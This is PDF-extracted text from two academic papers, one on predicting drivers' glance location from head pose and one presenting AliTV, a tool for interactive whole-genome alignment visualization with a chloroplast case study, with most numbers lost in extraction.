peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion the present study investigated head pose data to test the feasibility of using head pose to predict glance location, and served as an exploratory base for developing approaches to building semi-automated glance annotation systems (fridman et al., a; fridman et al., b). this study also systematically tested factors that may affect model performance (e.g., data structure, visual angles between two glance locations, and individual differences in head-glance correspondence). this study achieved fairly accurate classification performance (e.g., classifying glances to forward vs. glances to the center stack), and supports the feasibility of detecting drivers’ glances away from the road by not using eye-tracking data. especially, head pose data accurately classified glances to farther regions (i.e., high-eccentricity glances) from the center forward region. it can therefore be assumed that although classification accuracy for low-eccentricity glances is lower compared to the accuracy of high-eccentricity glances, the most detrimental glance regions (such as a center stack where the most current infotainment system are installed) can be detected by using head pose data. this work suggests that individual differences in head-glance correspondence may be separated into two classes and stimulated follow-on work that has been developed in fridman et al. ( b). however, from the data that is available, it is not clear if an individual can be ‘‘assigned’’ to one of the two classes (i.e., ‘‘owl’’ or ‘‘lizard’’), or if there are more factors such as roadway conditions, secondary type interacting with some individual propensity for certain movement patterns. this study used manually coded on-road data, which are relatively more valid and reliable than automatically tracked eye/head data from a driving simulator. overall, this work suggests that head rotation data, a feature that may be recorded in the vehicle with limited sophistication using commercially available sensors, may provide a potentially lower cost and higher quality estimate of attention allocation than eye tracking data. head movements may be used to fairly reliably predict safety critical off-road glances to regions in the vehicle frequently associated with in-vehicle distractions. acknowledgements an earlier paper covering a portion of this work (muñoz et al., ) appeared in the proceedings of the th international driving symposium on human factors in driver assessment, training, and vehicle design. authors would like to acknowledge the contribution of shannon roberts who provided valuable comments on this manuscript. additional information and declarations funding support for this work was provided by the us dot’s region i new england university transportation center at mit, the santos family foundation and the toyota class action settlement safety research and education program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: us dot’s region i new england university transportation center at mit. the santos family foundation. toyota class action settlement safety research and education program. competing interests trent victor is an employee of volvo cars and safer vehicle and traffic safety center. author contributions • joonbum lee analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • mauricio muñoz analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • lex fridman analyzed the data, wrote the paper, performed the computation work, reviewed drafts of the paper. • trent victor, bryan reimer and bruce mehler wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahlstrom c, victor t, wege c, steinmetz e. . processing of eye/head-tracking data in large-scale naturalistic driving data sets. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . breiman l. . random forest. machine learning ( ): – doi . /a: . carletta j. . assessing agreement on classification tasks: the kappa statistic. compu- tational linguistics ( ): – . driver focus-telematics working group. . statement of principles, criteria, and verification procedures on driver-interactions with advanced in-vehicle information and communication systems. washington, d.c.: alliance of automobile manufactures. fridman l, langhans p, lee j, reimer b. a. driver gaze region estimation without use of eye movement. ieee intelligent systems ( ): – . fridman l, lee j, reimer b, victor t. b. ‘owl’and ‘lizard’: patterns of head pose and eye pose in driver gaze classification. iet computer vision ( ): – doi . /iet-cvi. . . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /iet-cvi. . http://dx.doi.org/ . /peerj-cs. gee a, cipolla r. . determining the gaze of faces in images. image and vision computing ( ): – doi . / - ( ) - . horprasert t, yacoob y, davis ls. . computing -d head orientation from a monocular image sequence. in: proceedings of the second international conference on automatic face and gesture recognition, – . jolliffe i. . principal component analysis. hoboken: john wiley & sons, ltd. land mf, tatler bw. . steering with the head: the visual strategy of a racing driver. current biology : – doi . /s - ( ) - . li n, busso c. . detecting drivers’ mirror-checking actions and its application to maneuver and secondary task recognition. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . liang y, lee jd, yekhshatyan l. . how dangerous is looking away from the road? algorithms predict crash risk from glance patterns in naturalistic driving. human factors: the journal of the human factors and ergonomics society ( ): – . matlab. . statistics and machine learning toolbox. natick: the mathworks, inc. available at https://www.mathworks.com/products/statistics.html. muñoz m, lee j, reimer b, mehler b, victor t. . analysis of drivers’ head and eye movement correspondence: predicting drivers’ glance location using head rotation data. in: proceedings of the th international driving symposium on human factors in driver assessment, training, and vehicle design. snowbird, ut. muñoz m, reimer b, lee j, mehler b, fridman l. . distinguishing patterns in drivers’ visual attention allocation using hidden markov models. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . murphy-chutorian e, trivedi mm. . head pose estimation in computer vi- sion: a survey. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . national highway traffic safety administration. . distracted driving. available at https://www.nhtsa.gov/risky-driving/distracted-driving (accessed on ). rabiner l, juang bh. . an introduction to hidden markov models. aasp magazine, ieee ( ): – doi . /massp. . . sodhi m, reimer b, llamazares i. . glance analysis of driver eye movements to evaluate distraction. behavior research methods, instruments, & computers ( ): – doi . /bf . sokolova m, lapalme g. . a systematic analysis of performance measures for classification tasks. information processing & management ( ): – doi . /j.ipm. . . . statistic brain. . car crash fatality statistics . available at https://www. statisticbrain.com/car-crash-fatality-statistics- / (accessed on ). talamonti wj, huang w, tijerina l, kochhar d. . eye glance and head turn correspondence during secondary task performance in simulator driving. in: proceedings of the human factors and ergonomics society annual meeting, – . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /tits. . https://www.mathworks.com/products/statistics.html http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /tpami. . https://www.nhtsa.gov/risky-driving/distracted-driving http://dx.doi.org/ . /massp. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.ipm. . . https://www.statisticbrain.com/car-crash-fatality-statistics- / https://www.statisticbrain.com/car-crash-fatality-statistics- / http://dx.doi.org/ . /peerj-cs. available at http://pro.sagepub.com/lookup/doi/ . / (accessed on april ). talamonti wj, kochhar d, tijerina l. . eye glance and head turn correspondence during secondary task performance in simulator driving. in: proceedings of the human factors and ergonomics society annual meeting, – . tawari a, chen kh, trivedi mm. . where is the driver looking: analysis of head, eye and iris for robust gaze zone estimation. in: intelligent transportation systems (itsc), ieee th international conference on. piscataway: ieee, – . transportation research board. . the nd strategic highway research program naturalistic driving study dataset. available at https://insight.shrp nds.us. vicente f, huang z, xiong x, de la torre f, zhang w, levi d. . driver gaze tracking and eyes off the road detection system. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . victor tw, dozza m, bärgman j, boda c-n, engström j, flannagan c, lee jd, markkula g. . analysis of naturalistic driving study data: safer glances, driver inattention, and crash risk. no. shrp report s -s a-rw- . transportation research board, washington, d.c. wang y, reimer b, dobres j, mehler b. . the sensitivity of different methodologies for characterizing drivers’ gaze concentration under increased covnitive demand. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . wierwille ww. . visual and manual demands of in-car controls and displays. in: automotive ergonomics. london: taylor and francis, – . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://pro.sagepub.com/lookup/doi/ . / https://insight.shrp nds.us http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /peerj-cs. submitted april accepted april published june corresponding author frank förster, frank.foerster@uni-wuerzburg.de, foersterfrank@gmx.de academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright ankenbrand et al. distributed under creative commons cc-by . open access alitv—interactive visualization of whole genome comparisons markus j. ankenbrand ,*, sonja hohlfeld , ,*, thomas hackl , and frank förster , department of animal ecology and tropical biology, julius maximilian university, würzburg, germany department for bioinformatics, julius maximilian university, würzburg, germany department of civil and environmental engineering, massachusetts institute of technology, cambridge, ma, usa center for computational and theoretical biology, julius maximilian university, würzburg, germany * these authors contributed equally to this work. abstract whole genome alignments and comparative analysis are key methods in the quest of unraveling the dynamics of genome evolution. interactive visualization and exploration of the generated alignments, annotations, and phylogenetic data are important steps in the interpretation of the initial results. limitations of existing software inspired us to develop our new tool alitv, which provides interactive visualization of whole genome alignments. alitv reads multiple whole genome alignments or automatically generates alignments from the provided data. optional feature annotations and phylo- genetic information are supported. the user-friendly, web-browser based and highly customizable interface allows rapid exploration and manipulation of the visualized data as well as the export of publication-ready high-quality figures. alitv is freely available at https://github.com/alitvteam/alitv. subjects bioinformatics, computational biology keywords comparative genomics, alignment, visualization introduction advances in short- and long-read sequencing and assembly over the last decade (salzberg et al., ; chin et al., ; hackl et al., ) have made whole genome sequencing a routine task for biologists in various fields. public sequence databases already contain several thousand of draft and finished genomes (benson et al., ), with many more on the way (pagani et al., ). in particular, high throughput sequencing projects of pathogen strains related to recent outbreaks (rasko et al., ), and large-scale ecological studies targeting microbial communities and pan genomes of populations using metagenome and single cell sequencing approaches contribute in this process (turnbaugh et al., ; kashtan et al., ). these rich data sets can be explored for large-scale evolutionary processes using comparative genomics and whole genome alignments, revealing genomic recombinations (didelot, méric & falush, ; namouchi et al., ; yahara et al., ), islands and horizontal gene transfer (avrani et al., ; coleman et al., ; langille, hsiao & brinkman, ) as well as the often related dynamics of mobile or endogenous viral elements (fischer, ; touchon & rocha, ). other applications of whole genome how to cite this article ankenbrand et al. ( ), alitv—interactive visualization of whole genome comparisons. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:frank.foerster@uni-wuerzburg.de mailto:frank.foerster@uni-wuerzburg.de mailto:foersterfrank@gmx.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/alitvteam/alitv http://dx.doi.org/ . /peerj-cs. comparisons include the analysis of paleopolyploidization events (vanneste et al., ) and quantitative measurements of intra-tumour heterogeneity (schwarz et al., ). however, to facilitate proper interpretation of the obtained whole genome comparisons, visualization is key. one of the first tools to provide an interactive graphical representation of aligned genomes is the multiple whole genome alignment program mauve (darling et al., ). mauve represents genomes in a co-linear layout with homologous syntenic blocks indicated by colors and connecting lines. the interactive stand-alone viewer act (carver et al., ), in addition to alignment blocks, supports the representation of genomic annotations, such as genes. the r library genoplotr (guy, kultima & andersson, ) and the python based application easyfig (sullivan, petty & beatson, ), both also based on a co-linear layout and supporting feature annotations, lack interactive analysis features as they are designed to generate static figures. in addition to co-linear layouts, tools using circular representations of genomes have been developed. blastatlas (hallin, binnewies & ussery, ) and brig (alikhan et al., ) use multiple concentric rings to represent data of individual genomes, with brig also providing an interactive graphical interface. genomering (herbig et al., ) uses a circular representation as well, however, places all genomes on the same ring and syntenic blocks are connected with arcs extending into the center of the ring. the web-based comparative genomics software sybil (riley et al., ) provides interactive co-linear visualization of multiple whole genome alignments with feature annotations and also supports a phylogenetic tree alongside the alignments. the software builds on a relational chado database schema and, therefore, requires upload and import of custom data sets prior to analysis. during our analysis of existing software, we found that interactive tools are useful for data exploration, but offer limited support for the figure export and at low qualities. scripting-based tools provide higher levels of customization and figure quality, however, require familiarity with the respective language, thus often rendering the generation of figures time-consuming. for web- and database-based suites, such as sybil, the upload and import procedure complicate utilization and limit applicability. here we present our stand-alone application alitv (alignment toolbox and visualization) designed for interactive visualization of multiple whole genome alignments. alitv aims to enable researches to either directly read or automatically generate new whole genome alignments, rapidly explore the results, manipulate and customize the visualization and, at the end of the day, export appealing, publication-grade figures. alitv reads sequence and annotation or alignment data in common formats (fasta, genbank, gff, maf, newick, and so on), and internally computes alignments using lastz (harris, ). the user-friendly interface is built on the state-of-the-art d .js javascript framework and can be utilized in a platform independent manner with common web browsers. genomes are represented in a highly customizable co-linear layout including annotations and an optional phylogenetic tree. the tree is not computed by alitv but has to be provided during data generation. also, the order of genomes is not automatically optimized to minimize rearrangements. customizations to the figure by the user can be saved, reloaded, and exported to high quality svg files. ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. methods our tool alitv is divided into two parts. the first non-interactive part is required for the generation of the input files for our interactive viewer. the second part represents that interactive viewer in the form of a svg file embedded in a html website. the latest version of our code can be obtained from github (https://github.com/alitvteam/alitv). it is planned to adjust alitv in order to integrate it into the biojs registry (https: //biojsnet.herokuapp.com/, corpas et al. ( )). the general design of alitv assures, that alitv runs on different hard- and software platforms, e.g., linux, macosx, and windows. the following sections describe those parts in more detail. data preparation the data preparation is performed by a single perl script named alitv.pl. this script uses a set of different perl modules to import incoming data and generate valid json input data for our visualization engine described in the next paragraph. one of our aims is to support as many different input formats for sequence and annotation information as possible. therefore, we used the well tested and broadly accepted bioperl as basis for our modules (stajich et al., ). the script alitv.pl uses a yaml file to specify the different input files. moreover, an easy-to-use-mode is available which requires only a couple of input files and generates the required yaml file on the fly. this generated yaml settings file might be used to reproduce alitv results or can be used as starting point to alter configuration parameters. during the preparation step, alitv requires all-vs-all alignments of the complete sequence set. those alignments are generated or user provided. the current version of alitv.pl requires lastz to generate all alignments in maf format (harris, ). nevertheless, bioperl supports a broad range of alignment formats. therefore, other programs can easily be added to the list of supported alignment programs. moreover, the ability to use existing alignments allows a huge time benefit, when alitv parameters are changed to optimize the visualization via yaml settings file in a non-interactive manner. thus future versions of alitv.pl will support caching of alignments based on checksums to avoid unnecessary recalculations. the final result of our alitv.pl is a json file, which can be load into our interactive visualization page. interactive visualization alitv is implemented in javascript. our code is documented using jsdoc (version . . http://usejsdoc.org/, . . ). alitv generates a svg which is presented within a browser using html . a tutorial is available at https://alitv.readthedocs.io/en/latest/index.html. to gain advanced application possibilities we use different libraries. the javascript library d .js . . (http://d js.org/, . . ) provides a wide range of pre- built functions for calculating and drawing the interactive figure. in addition, alitv employes jquery . . (https://jquery.com/, . . ) to ease access to several parts of the figure. this is helpful for hiding selected sequences, genes or links. jqueryui . . (https://jqueryui.com/, . . ) gives us the possibilities to add user-friendly ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/alitvteam/alitv https://biojsnet.herokuapp.com/ https://biojsnet.herokuapp.com/ http://usejsdoc.org/ https://alitv.readthedocs.io/en/latest/index.html http://d js.org/ https://jquery.com/ https://jqueryui.com/ http://dx.doi.org/ . /peerj-cs. table chloroplast genomes of the parasitic and non-parasitic plants used in the case study. species accession life-style reference olea europaea nc_ non-parasitic messina ( ) lindenbergia philippensis nc_ non-parasitic wicke et al. ( ) cistanche phelypaea nc_ holo-parasitic wicke et al. ( ) epifagus virginiana nc_ holo-parasitic wolfe, morden & palmer ( ) orobanche gracilis nc_ holo-parasitic wicke et al. ( ) schwalbea americana nc_ hemi-parasitic wicke et al. ( ) nicotiana tabacum nc_ non-parasitic kunnimalaiyaan & nielsen ( ) interactions to alitv. with sliders the user has the chance to specify values for link length and link identity. context menus offer direct and native interactions with the figure. to guarantee correct code functionality we engineer alitv according to the test driven development. first we write an automated test case that defines a new function. then we add the minimum amount of code to make the test pass. finally we refactor the code to accepted standards. we use jasmine . (http://jasmine.github.io/, . . ), as framework for testing our javascript code. the tests can run either via the specrunner or the command line using the taskrunner grunt . . (http://gruntjs.com/, . . ). results and discussion to demonstrate the capabilities of alitv we describe a short case study using seven published chloroplast genomes (table ). four of the chloroplasts belong to parasitic plant species and three to non-parasitic ones. parasitic plants rely much less or not at all on photosynthetic activity, a trait that should be reflected in the genomic structure of their chloroplast genomes. to assess this hypothesis the chloroplast genomes were downloaded from ncbi and processed with alitv.pl. for demonstration purposes, the chloroplast genome of nicotiana tabacum was split in two pieces to represent an unfinished genome with more than one contig, and the genome sequence of schwalbea americana was reverse-complemented (flipped). the pair-wise whole genome alignments are visualized by alitv (fig. a). the left-hand side of the display panel shows the phylogenetic tree for the seven species with species names as tip labels (parasitic plants are highlighted with an asterisk). the tree has been created provided in accordance to ncbi taxonomy (sayers et al., ). next to the tip labels, each genome is drawn as a scaled and annotated horizontal bar. the orientation of the s. americana genome was swapped back to match the orientation of the other genomes, indicated by the tick coordinates in reverse order ( on the right side). n. tabacum is represented by two bars as the sequence has been split into two parts. on those bars features (e.g., genes or (irs)) are shown as either rectangles or arrows. alignments between adjacent genomes are represented as colored ribbons. the bottom legend shows the default color scale from red to green corresponding to low and high identity respectively. the most striking observation is that three of the chloroplast genomes have drastically reduced sizes. all of those are parasitic (table ). interestingly the chloroplast genome ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://www.ncbi.nlm.nih.gov/nuccore/nc_ http://jasmine.github.io/ http://gruntjs.com/ http://dx.doi.org/ . /peerj-cs. bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp n.tabacum o.europaea l.philippensis s.americana* c.phelypaea* e.virginiana* o.gracilis* bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp n.tabacum o.europaea l.philippensis s.americana* c.phelypaea* e.virginiana* o.gracilis* ndh ycf invertedrepeat bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp o.europaea l.philippensis c.phelypaea* e.virginiana* o.gracilis* s.americana* n.tabacum bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp bp n.tabacum o.europaea l.philippensis s.americana* c.phelypaea* e.virginiana* o.gracilis* a b c d figure whole genome alignment of seven chloroplasts visualized by alitv. species names were italicized and parasites marked with asterisks ex post. (a) default layout with a phylogenetic tree on the left-hand side and genomes represented by co-linear horizontal bars on the right; genes and inverted repeats are displayed as rectangles and arrows, respectively; colored ribbons connect corresponding regions in the alignment. (b–d) customized layouts: (b) reordered genomes, non-parasitic plants at the top and holo-parasitic plants at the bottom; (c) links filtered by identity (only those with %– % identity are drawn); (d) zoom in on a potential segmental duplication (red ‘x’-shaped links) in the top four genomes. size of s. americana is similar to that of the non-parasitic plants. this can be explained by the life style of s. americana which is hemi-parasitic in contrast to the other parasitic plants which are holo-parasites. the features shown are the ir regions as arrows, the hypothetical chloroplast open reading frames as orange and the genes of the ndh family as pink rectangles. first, it can be seen that there is a big variation in size of the inverted repeats. while the ir of orobanche gracilis is the shortest with roughly , bp, that of s. americana is the largest with roughly , bp. second, there are less genes of the ndh family on cistanche phelypaea, epifagus virginiana, o. gracilis, and s. americana. members of the ndh gene family encode subunits of the nadh dehydrogenase-like complex, which is involved in chlororespiration (martín & sabater, ). however, they are not required for plant growth under optimal conditions (burrows, ). the absence of ndh genes ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in chloroplasts of parasitic plants has been studied in detail in wicke et al. ( ). loss of ndh genes has also been reported for photosynthetic plants such as some conifers and orchids (wakasugi et al., ; kim et al., ). looking at the pairwise similarities of adjacent genomes, it is apparent that the non-parasitic plants (e.g., olea europaea and lindenbergia philippensis) have high overall sequence identity. in contrast, the sequence similarity within parasitic plants is lower. this observation can help framing a hypothesis about the evolutionary pressure on chloroplasts of parasitic plants. another interesting observation is the distribution of missing regions of c. phelypaea in comparison to l. philippensis. missing regions are distributed all over the genome and the order of the remaining parts remains stable. wicke et al. ( ) describe an inversion in the large single copy region of s. americana compared to non-parasitic plants which is clearly visible by the link to n. tabacum around the kbp position. all these observations can be made by simply looking at the raw figure created by alitv.pl and visualized by alitv. however the figure can be analyzed interactively in more detail. one shortcoming of the linear representation of whole genome alignments is the limited comparability of non-adjacent sequences. therefore, alitv provides a way for the user to re-order the genomes on the figure (fig. b). if reordering causes inconsistencies with the phylogenetic tree, the tree is hidden and a warning message is displayed. furthermore, the links can be filtered by their alignment identity. the default setting is to display only links with minimal identity of %. but sometimes it might be interesting to look at regions with less similarity. to see these regions it is also important to hide large regions with high similarity. this can be achieved by changing the identity via a slider (fig. c). after setting the identity range to %– % red ‘x’-shaped links between n. tabacum, o. europaea, l. philippensis, and s. americana become apparent. for detailed inspection of regions of interest, alitv provides a zoom function (fig. d). this way the exact location of the alignments can be traced to the locations of psaa and psab. moreover alitv provides functions like alignment length filtering, selective hiding of sequences, links and features, change of orientation (reverse complement) and rotation of circular chromosomes. finally, it is possible to tweak many graphical parameters, such as colors, labels or spacing, directly via the interface to produce a publication quality figure which can be saved in svg format. furthermore, the current state can be saved in json format in order to share it with collaborators or continue the work with alitv at a later time. conclusion the case study demonstrates the suitability of alitv as a tool for visualizing and analyzing whole genome comparisons. alitv can be used to easily create a figure that show cases many genomic features at once. furthermore, the rich interactive features enable the exploratory analysis and discovery of previously unknown features. thus, novel hypotheses can be generated that can then be validated with experimental methods. therefore, alitv is a useful tool that will help scientists to find biologically meaningful information in the vast amount of genomic data. ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements we would like to thank felix bemm for fruitful discussions about file formats and must-have-features during the development of alitv and for supervising mja during his bachelor thesis. additional information and declarations funding mja was supported by a grant of the german excellence initiative to the graduate school of life sciences, university of würzburg. the publication fee was funded by the mit libraries. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: german excellence initiative to the graduate school of life sciences, university of würzburg. mit libraries. competing interests the authors declare there are no competing interests. author contributions • markus j. ankenbrand and frank förster conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • sonja hohlfeld performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • thomas hackl conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/alitvteam/alitv. references alikhan n-f, petty nk, ben zakour nl, beatson sa. . blast ring image gen- erator (brig): simple prokaryote genome comparisons. bmc genomics : doi . / - - - . ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/alitvteam/alitv http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. avrani s, wurtzel o, sharon i, sorek r, lindell d. . genomic island variability facilitates prochlorococcus—virus coexistence. nature ( ): – doi . /nature . benson da, cavanaugh m, clark k, karsch-mizrachi i, lipman dj, ostell j, say- ers ew. . genbank. nucleic acids research (database issue):d –d doi . /nar/gks . burrows pa. . identification of a functional respiratory complex in chloroplasts through analysis of tobacco mutants containing disrupted plastid ndh genes. the embo journal ( ): – doi . /emboj/ . . . carver t, berriman m, tivey a, patel c, böhme u, barrell bg, parkhill j, ra- jandream m-a. . artemis and act: viewing, annotating and comparing sequences stored in a relational database. bioinformatics ( ): – doi . /bioinformatics/btn . chin c-s, alexander dh, marks p, klammer aa, drake j, heiner c, clum a, copeland a, huddleston j, eichler ee, turner sw, korlach j. . nonhybrid, finished microbial genome assemblies from long-read smrt sequencing data. nature methods : – doi . /nmeth. . coleman ml, sullivan mb, martiny ac, steglich c, barry k, delong ef, chisholm sw. . genomic islands and the ecology and evolution of prochlorococcus. science ( ): – doi . /science. . corpas m, jimenez r, carbon sj, garcía a, garcia l, goldberg t, gomez j, kalderimis a, lewis se, mulvany i, pawlik a, rowland f, salazar g, schreiber f, sillitoe i, spooner wh, thanki a, villaveces jm, yachdav g, hermjakob h. . biojs: an open source standard for biological visualisation—its status in . f research : doi . /f research. - .v . darling a. ce, mau b, blattner fr, perna nt. . mauve: multiple alignment of con- served genomic sequence with rearrangements. genome research ( ): – doi . /gr. . didelot x, méric g, falush d. . impact of homologous and non-homologous recombination in the genomic evolution of escherichia coli. bmc genomics : doi . / - - - . fischer mg. . virophages go nuclear in the marine alga bigelowiella natans. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . guy l, kultima jr, andersson s. ge. . genoplotr: comparative gene and genome visualization in r. bioinformatics ( ): – doi . /bioinformatics/btq . hackl t, hedrich r, schultz j, förster f. . proovread: large-scale high-accuracy pacbio correction through iterative short read consensus. bioinformatics ( ): – doi . /bioinformatics/btu . hallin pf, binnewies tt, ussery dw. . the genome blastatlas-a genewiz extension for visualization of whole-genome homology. molecular biosystems ( ): – doi . /b h. ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /emboj/ . . http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /science. http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /gr. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /b h http://dx.doi.org/ . /peerj-cs. harris rs. . improved pairwise alignment of genomic dna. phd thesis, pennsylva- nia state university. herbig a, jäger g, battke f, nieselt k. . genomering: alignment visual- ization based on supergenome coordinates. bioinformatics ( ):i –i doi . /bioinformatics/bts . kashtan n, roggensack se, rodrigue s, thompson jw, biller sj, coe a, ding h, marttinen p, malmstrom rr, stocker r, follows mj, stepanauskas r, chisholm sw. . single-cell genomics reveals hundreds of coexisting subpopulations in wild prochlorococcus. science ( ): – doi . /science. . kim ht, kim js, moore mj, neubig km, williams nh, whitten wm, kim j-h. . seven new complete plastome sequences reveal rampant independent loss of the ndh gene family across orchids and associated instability of the in- verted repeat/small single-copy region boundaries. plos one ( ):e doi . /journal.pone. . kunnimalaiyaan m, nielsen bl. . fine mapping of replication origins (ori a and ori b) in nicotiana tabacum chloroplast dna. nucleic acids research ( ): – doi . /nar/ . . . langille m, hsiao w, brinkman f. . evaluation of genomic island predic- tors using a comparative genomics approach. bmc bioinformatics : doi . / - - - . martín m, sabater b. . plastid ndh genes in plant evolution. plant physiology and biochemistry ( ): – doi . /j.plaphy. . . . messina r. . olea europaea chloroplast, complete genome. available at http://www.ncbi.nlm.nih.gov/nuccore/nc_ . (accessed on june ). namouchi a, didelot x, schöck u, gicquel b. . after the bottleneck: genome- wide diversification of the mycobacterium tuberculosis complex by muta- tion, recombination, and natural selection. genome research : – doi . /gr. . . pagani i, liolios k, jansson j, chen i-ma, smirnova t, nosrat b, markowitz vm, kyrpides nc. . the genomes online database (gold) v. : status of genomic and metagenomic projects and their associated metadata. nucleic acids research (database issue):d –d doi . /nar/gkr . rasko da, dale wr, sahl jw, bashir a, boisen n, scheutz f, paxinos ee, sebra r, chin c-s, iliopoulos d, klammer a, peluso p, lee l, kislyuk ao, bullard j, kasarskis a, wang s, eid j, rank d, redman jc, steyert sr, frimodt-møller j, struve c, petersen am, krogfeld ka, nataro jp, schadt ee, waldor mk. . origins of the e. coli strain causing an outbreak of hemolytic-uremic syndrome in germany. the new england journal of medicine ( ): – doi . /nejmoa . riley dr, angiuoli sv, crabtree j, dunning hotopp jc, tettelin h. . using sybil for 